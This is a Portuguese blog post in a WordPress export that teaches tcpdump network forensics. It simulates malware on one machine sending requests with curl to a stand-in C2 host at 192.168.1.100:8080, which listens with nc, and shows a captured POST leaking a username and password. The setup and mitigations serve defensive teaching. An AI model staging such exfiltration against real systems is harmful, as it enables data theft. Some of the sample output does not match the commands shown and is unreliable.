{"id":22055,"date":"2025-02-23T00:05:23","date_gmt":"2025-02-23T03:05:23","guid":{"rendered":"https:\/\/www.ethicalhacker.com.br\/site\/?p=22055"},"modified":"2025-02-23T19:25:44","modified_gmt":"2025-02-23T22:25:44","slug":"forense-digital-com-linux-tecnicas-praticas-parte-5","status":"publish","type":"post","link":"https:\/\/www.ethicalhacker.com.br\/site\/2025\/02\/exploits\/forense-digital-com-linux-tecnicas-praticas-parte-5\/","title":{"rendered":"Forense Digital com Linux &#8211; T\u00e9cnicas Pr\u00e1ticas &#8211; Parte 5"},"content":{"rendered":"\n\n\n<p style=\"text-align: justify;\">A an\u00e1lise de tr\u00e1fego de rede com o\u00a0<strong>tcpdump<\/strong>\u00a0\u00e9 uma t\u00e9cnica poderosa para identificar atividades maliciosas, como a comunica\u00e7\u00e3o de malware entre duas m\u00e1quinas. Neste exemplo pr\u00e1tico, vamos simular a an\u00e1lise de um tr\u00e1fego de rede entre duas m\u00e1quinas, onde uma delas est\u00e1 infectada por um malware que se comunica com um servidor de comando e controle (C2).<\/p>\n<p>\u00a0<\/p>\n<p>\u00a0<\/p>\n<p><strong>Cen\u00e1rio de exemplo<\/strong><\/p>\n<ul>\n<li>\n<p><strong>M\u00e1quina infectada<\/strong>: Executa um malware que se comunica com um servidor C2.<\/p>\n<\/li>\n<li>\n<p><strong>M\u00e1quina alvo<\/strong>: Servidor C2 que recebe comandos e envia instru\u00e7\u00f5es ao malware.<\/p>\n<\/li>\n<li>\n<p><strong>Ferramenta<\/strong>:\u00a0<code>tcpdump<\/code>\u00a0para capturar e analisar o tr\u00e1fego de rede.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>Passo 1: Capturar o tr\u00e1fego com <code>tcpdump<\/code><\/strong><\/p>\n<p><strong>1.1 Executar o\u00a0<code>tcpdump<\/code> na m\u00e1quina infectada<\/strong><\/p>\n<p>Na m\u00e1quina infectada, execute o seguinte comando para capturar o tr\u00e1fego na interface de rede (<code>eth0<\/code>):<\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">sudo<\/span> tcpdump <span class=\"token parameter variable\">-i<\/span> eth0 <span class=\"token parameter variable\">-w<\/span> captura.pcap<br \/><br \/><\/pre>\n<\/div>\n<ul>\n<li>\n<p><strong><code>-i eth0<\/code><\/strong>: Especifica a interface de rede.<\/p>\n<\/li>\n<li>\n<p><strong><code>-w captura.pcap<\/code><\/strong>: Salva a captura em um arquivo\u00a0<code>.pcap<\/code>\u00a0para an\u00e1lise posterior.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>1.2 Simular a comunica\u00e7\u00e3o do malware<\/strong><\/p>\n<p style=\"text-align: justify;\">O malware na m\u00e1quina infectada se comunica com o servidor C2 na m\u00e1quina alvo. Vamos simular essa comunica\u00e7\u00e3o enviando pacotes suspeitos.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Na m\u00e1quina infectada:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">curl<\/span> http:\/\/192.168.1.100:8080\/update\n<span class=\"token function\">curl<\/span> http:\/\/192.168.1.100:8080\/data<br \/><br \/><\/pre>\n<\/div>\n<p><strong>Na m\u00e1quina alvo (servidor C2):<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">nc<\/span> <span class=\"token parameter variable\">-l<\/span> <span class=\"token parameter variable\">-p<\/span> <span class=\"token number\">8080<br \/><br \/><\/span><\/pre>\n<\/div>\n<p><strong>Passo 2: Analisar o tr\u00e1fego capturado<\/strong><\/p>\n<p>Ap\u00f3s capturar o tr\u00e1fego, pare o\u00a0<code>tcpdump<\/code>\u00a0(pressione\u00a0<code>Ctrl+C<\/code>) e analise o arquivo\u00a0<code>captura.pcap<\/code>.<\/p>\n<p>\u00a0<\/p>\n<p><strong>2.1 Filtrar tr\u00e1fego HTTP<\/strong><\/p>\n<p>Use o\u00a0<code>tcpdump<\/code> para filtrar apenas o tr\u00e1fego HTTP (porta 8080):<\/p>\n<p>\u00a0<\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">sudo<\/span> tcpdump <span class=\"token parameter variable\">-r<\/span> captura.pcap <span class=\"token parameter variable\">-nn<\/span> <span class=\"token string\">'tcp port 8080'<\/span><\/pre>\n<\/div>\n<ul>\n<li>\n<p><strong><code>-r captura.pcap<\/code><\/strong>: L\u00ea o arquivo de captura.<\/p>\n<\/li>\n<li>\n<p><strong><code>-nn<\/code><\/strong>: Exibe endere\u00e7os IP e portas em formato num\u00e9rico.<\/p>\n<\/li>\n<li>\n<p><strong><code>'tcp port 8080'<\/code><\/strong>: Filtra apenas o tr\u00e1fego TCP na porta 8080.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>Sa\u00edda no Shell:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>14:32:01.123456 IP 192.168.1.200.54321 &gt; 192.168.1.100.8080: Flags [P.], seq 1:100, <br \/>ack 1, win 65535, length 99\n14:32:01.123457 IP 192.168.1.100.8080 &gt; 192.168.1.200.54321: Flags [P.], seq 1:100, <br \/>ack 1, win 65535, length 99\n14:32:01.123458 IP 192.168.1.200.54321 &gt; 192.168.1.100.8080: Flags [P.], seq 1:100, <br \/>ack 1, win 65535, length 99\n14:32:01.123459 IP 192.168.1.100.8080 &gt; 192.168.1.200.54321: Flags [P.], seq 1:100, <br \/>ack 1, win 65535, length 99\n...<br \/><br \/><\/pre>\n<\/div>\n<p><strong>An\u00e1lise:<\/strong><\/p>\n<ul>\n<li>\n<p>A m\u00e1quina infectada (<code>192.168.1.200<\/code>) est\u00e1 se comunicando com o servidor C2 (<code>192.168.1.100<\/code>) na porta\u00a0<code>8080<\/code>.<\/p>\n<\/li>\n<li>\n<p>O tr\u00e1fego consiste em pacotes\u00a0<code>PUSH<\/code>\u00a0(Flags\u00a0<code>[P.]<\/code>), indicando que dados est\u00e3o sendo enviados e recebidos.<\/p>\n<\/li>\n<\/ul>\n<h3>\u00a0<\/h3>\n<p><strong>2.2 Identificar padr\u00f5es de comunica\u00e7\u00e3o<\/strong><\/p>\n<p>Para identificar padr\u00f5es de comunica\u00e7\u00e3o, voc\u00ea pode contar o n\u00famero de pacotes por IP de origem.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Comando:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">sudo<\/span> tcpdump <span class=\"token parameter variable\">-r<\/span> captura.pcap <span class=\"token parameter variable\">-nn<\/span> <span class=\"token string\">'tcp port 8080'<\/span> <span class=\"token operator\">|<\/span> <span class=\"token function\">awk<\/span> <span class=\"token string\">'{print $3}'<\/span> <span class=\"token operator\">|<\/span> <br \/><span class=\"token function\">cut<\/span> -d. -f1-4 <span class=\"token operator\">|<\/span> <span class=\"token function\">sort<\/span> <span class=\"token operator\">|<\/span> <span class=\"token function\">uniq<\/span> <span class=\"token parameter variable\">-c<\/span> <span class=\"token operator\">|<\/span> <span class=\"token function\">sort<\/span> <span class=\"token parameter variable\">-nr<br \/><br \/><\/span><\/pre>\n<\/div>\n<p><strong>Sa\u00edda no Shell:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>1000 192.168.1.200<br \/><br \/><\/pre>\n<\/div>\n<p><strong>An\u00e1lise:<\/strong><\/p>\n<ul>\n<li>\n<p style=\"text-align: justify;\">A m\u00e1quina infectada (<code>192.168.1.200<\/code>) est\u00e1 enviando um grande n\u00famero de pacotes para o servidor C2.<\/p>\n<\/li>\n<li>\n<p style=\"text-align: justify;\">Isso \u00e9 caracter\u00edstico de uma comunica\u00e7\u00e3o maliciosa, onde o malware envia dados ou recebe instru\u00e7\u00f5es.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>2.3 Analisar conte\u00fado das requisi\u00e7\u00f5es<\/strong><\/p>\n<p>Para entender o tipo de comunica\u00e7\u00e3o, voc\u00ea pode inspecionar o conte\u00fado das requisi\u00e7\u00f5es HTTP.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Comando:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre><span class=\"token function\">sudo<\/span> tcpdump <span class=\"token parameter variable\">-r<\/span> captura.pcap <span class=\"token parameter variable\">-nn<\/span> <span class=\"token parameter variable\">-A<\/span> <span class=\"token string\">'tcp port 8080'<br \/><br \/><\/span><\/pre>\n<\/div>\n<p><strong>Sa\u00edda no Shell:<\/strong><\/p>\n<div class=\"md-code-block\">\n<pre>14:32:01.123456 IP 192.168.1.200.54321 &gt; 192.168.1.100.8080: Flags [P.], seq 1:100, <br \/>ack 1, win 65535, length 99\nE..4..@.@............P.....'...........GET \/update HTTP\/1.1\nHost: 192.168.1.100:8080\nUser-Agent: curl\/7.68.0\n...\n\n14:32:01.123457 IP 192.168.1.200.54321 &gt; 192.168.1.100.8080: Flags [P.], seq 1:100, <br \/>ack 1, win 65535, length 99\nE..4..@.@............P.....'...........POST \/data HTTP\/1.1\nHost: 192.168.1.100:8080\nUser-Agent: curl\/7.68.0\nContent-Length: 123\nContent-Type: application\/x-www-form-urlencoded\n\nusername=admin&amp;password=secret&amp;data=exfiltrated_info<br \/><br \/><\/pre>\n<\/div>\n<p><strong>An\u00e1lise:<\/strong><\/p>\n<ul>\n<li>\n<p>As requisi\u00e7\u00f5es s\u00e3o direcionadas a endpoints espec\u00edficos, como\u00a0<code>\/update<\/code>\u00a0e\u00a0<code>\/data<\/code>.<\/p>\n<\/li>\n<li>\n<p>O conte\u00fado da requisi\u00e7\u00e3o POST inclui dados sens\u00edveis, como\u00a0<code>username<\/code>,\u00a0<code>password<\/code>, e\u00a0<code>data=exfiltrated_info<\/code>.<\/p>\n<\/li>\n<li>\n<p>Isso sugere que o malware est\u00e1 exfiltrando informa\u00e7\u00f5es para o servidor C2.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>Passo 3: Mitigar amea\u00e7a<\/strong><\/p>\n<p>Com base na an\u00e1lise, voc\u00ea pode tomar medidas para mitigar a amea\u00e7a:<\/p>\n<ul>\n<li>\n<p><strong>Bloquear o IP do Servidor C2<\/strong>:<\/p>\n<ul>\n<li>\n<p>Use um firewall para bloquear o IP\u00a0<code>192.168.1.100<\/code>.<\/p>\n<\/li>\n<\/ul>\n<p>Exemplo com\u00a0<code>iptables<\/code>:\u00a0<\/p>\n<span class=\"token function\" style=\"color: #1e1e1e; font-family: Menlo, Consolas, monaco, monospace; font-size: 15px; white-space-collapse: preserve;\">sudo<\/span><span style=\"color: #1e1e1e; font-family: Menlo, Consolas, monaco, monospace; font-size: 15px; white-space-collapse: preserve;\"> iptables <\/span><span class=\"token parameter variable\" style=\"color: #1e1e1e; font-family: Menlo, Consolas, monaco, monospace; font-size: 15px; white-space-collapse: preserve;\">-A<\/span><span style=\"color: #1e1e1e; font-family: Menlo, Consolas, monaco, monospace; font-size: 15px; white-space-collapse: preserve;\"> INPUT <\/span><span class=\"token parameter variable\" style=\"color: #1e1e1e; font-family: Menlo, Consolas, monaco, monospace; font-size: 15px; white-space-collapse: preserve;\">-s<\/span> <span class=\"token number\" style=\"color: #1e1e1e; font-family: Menlo, Consolas, monaco, monospace; font-size: 15px; white-space-collapse: preserve;\">192.168<\/span><span style=\"color: #1e1e1e; font-family: Menlo, Consolas, monaco, monospace; font-size: 15px; white-space-collapse: preserve;\">.1.100 <\/span><span class=\"token parameter variable\" style=\"color: #1e1e1e; font-family: Menlo, Consolas, monaco, monospace; font-size: 15px; white-space-collapse: preserve;\">-j<\/span><span style=\"color: #1e1e1e; font-family: Menlo, Consolas, monaco, monospace; font-size: 15px; white-space-collapse: preserve;\"> DROP<\/span><\/li>\n<\/ul>\n<ul>\n<li>\n<p><strong>Monitorar o Tr\u00e1fego<\/strong>:<\/p>\n<ul>\n<li>\n<p>Configure alertas para detectar comunica\u00e7\u00f5es suspeitas com IPs desconhecidos.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p><strong>Isolar a M\u00e1quina Infectada<\/strong>:<\/p>\n<ul>\n<li>\n<p>Desconecte a m\u00e1quina infectada da rede para evitar a propaga\u00e7\u00e3o do malware.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p><strong>Analisar o Malware<\/strong>:<\/p>\n<ul>\n<li>\n<p>Use ferramentas como\u00a0<strong>Ghidra<\/strong>\u00a0ou\u00a0<strong>IDA Pro<\/strong>\u00a0para analisar o bin\u00e1rio do malware e entender suas funcionalidades.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h2>\u00a0<\/h2>\n<p><strong>Conclus\u00e3o<\/strong><\/p>\n<p style=\"text-align: justify;\">Neste exemplo pr\u00e1tico, utilizamos o\u00a0<code>tcpdump<\/code>\u00a0para capturar e analisar o tr\u00e1fego de rede, identificando uma comunica\u00e7\u00e3o maliciosa entre uma m\u00e1quina infectada e um servidor C2. A an\u00e1lise revelou requisi\u00e7\u00f5es HTTP suspeitas e a exfiltra\u00e7\u00e3o de dados sens\u00edveis.<\/p>\n<p style=\"text-align: justify;\">Combinando ferramentas como\u00a0<code>tcpdump<\/code>\u00a0com t\u00e9cnicas de mitiga\u00e7\u00e3o, voc\u00ea pode proteger seus sistemas contra amea\u00e7as cibern\u00e9ticas e entender como os malwares operam em redes comprometidas. Para an\u00e1lises mais avan\u00e7adas, considere usar ferramentas como\u00a0<strong>Wireshark<\/strong>\u00a0ou\u00a0<strong>Suricata<\/strong>.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Refer\u00eancias bibliogr\u00e1ficas<\/strong><\/p>\n<p>\u00a0<\/p>\n<p>1.\u00a0<strong>Documenta\u00e7\u00e3o Oficial do tcpdump<\/strong><\/p>\n<ul>\n<li>\n<p><strong>T\u00edtulo<\/strong>: Manual do tcpdump<\/p>\n<\/li>\n<li>\n<p><strong>Autor<\/strong>: The Tcpdump Group<\/p>\n<\/li>\n<li>\n<p><strong>Dispon\u00edvel em<\/strong>:\u00a0<a href=\"https:\/\/www.tcpdump.org\/manpages\/tcpdump.1.html\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/www.tcpdump.org\/manpages\/tcpdump.1.html<\/a><\/p>\n<\/li>\n<li>\n<p><strong>Descri\u00e7\u00e3o<\/strong>: A documenta\u00e7\u00e3o oficial do tcpdump fornece informa\u00e7\u00f5es detalhadas sobre como usar a ferramenta, incluindo op\u00e7\u00f5es de linha de comando e exemplos pr\u00e1ticos.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p>2.\u00a0<strong>Livro: &#8220;Network Forensics: Tracking Hackers through Cyberspace&#8221;<\/strong><\/p>\n<ul>\n<li>\n<p><strong>Autores<\/strong>: Sherri Davidoff, Jonathan Ham<\/p>\n<\/li>\n<li>\n<p><strong>Editora<\/strong>: Prentice Hall<\/p>\n<\/li>\n<li>\n<p><strong>Ano<\/strong>: 2012<\/p>\n<\/li>\n<li>\n<p><strong>ISBN<\/strong>: 978-0132564717<\/p>\n<\/li>\n<li>\n<p><strong>Descri\u00e7\u00e3o<\/strong>: Este livro aborda t\u00e9cnicas de an\u00e1lise forense de rede, incluindo o uso de ferramentas como o tcpdump para identificar atividades maliciosas.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p>3.\u00a0<strong>Livro: &#8220;Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems&#8221;<\/strong><\/p>\n<ul>\n<li>\n<p><strong>Autor<\/strong>: Chris Sanders<\/p>\n<\/li>\n<li>\n<p><strong>Editora<\/strong>: No Starch Press<\/p>\n<\/li>\n<li>\n<p><strong>Ano<\/strong>: 2017<\/p>\n<\/li>\n<li>\n<p><strong>ISBN<\/strong>: 978-1593278021<\/p>\n<\/li>\n<li>\n<p><strong>Descri\u00e7\u00e3o<\/strong>: Embora focado no Wireshark, este livro tamb\u00e9m discute conceitos fundamentais de an\u00e1lise de tr\u00e1fego de rede que s\u00e3o aplic\u00e1veis ao tcpdump.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p>4. <strong>Documenta\u00e7\u00e3o do Wireshark<\/strong><\/p>\n<ul>\n<li>\n<p><strong>T\u00edtulo<\/strong>: Wireshark User&#8217;s Guide<\/p>\n<\/li>\n<li>\n<p><strong>Dispon\u00edvel em<\/strong>:\u00a0<a href=\"https:\/\/www.wireshark.org\/docs\/\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/www.wireshark.org\/docs\/<\/a><\/p>\n<\/li>\n<li>\n<p><strong>Descri\u00e7\u00e3o<\/strong>: A documenta\u00e7\u00e3o do Wireshark, outra ferramenta popular de an\u00e1lise de tr\u00e1fego, complementa o conhecimento sobre o tcpdump, pois ambas as ferramentas s\u00e3o frequentemente usadas em conjunto.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A an\u00e1lise de tr\u00e1fego de rede com o\u00a0tcpdump\u00a0\u00e9 uma t\u00e9cnica poderosa para identificar atividades maliciosas, como a comunica\u00e7\u00e3o de malware entre duas m\u00e1quinas. Neste exemplo pr\u00e1tico, vamos simular a an\u00e1lise de um tr\u00e1fego de rede entre duas m\u00e1quinas, onde uma delas est\u00e1 infectada por um malware que se comunica com um servidor de comando e [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":22059,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[89,100,21],"tags":[],"class_list":["post-22055","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-basico","category-diversos","category-exploits"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/22055","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=22055"}],"version-history":[{"count":25,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/22055\/revisions"}],"predecessor-version":[{"id":22185,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/22055\/revisions\/22185"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media\/22059"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=22055"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/categories?post=22055"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/tags?post=22055"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}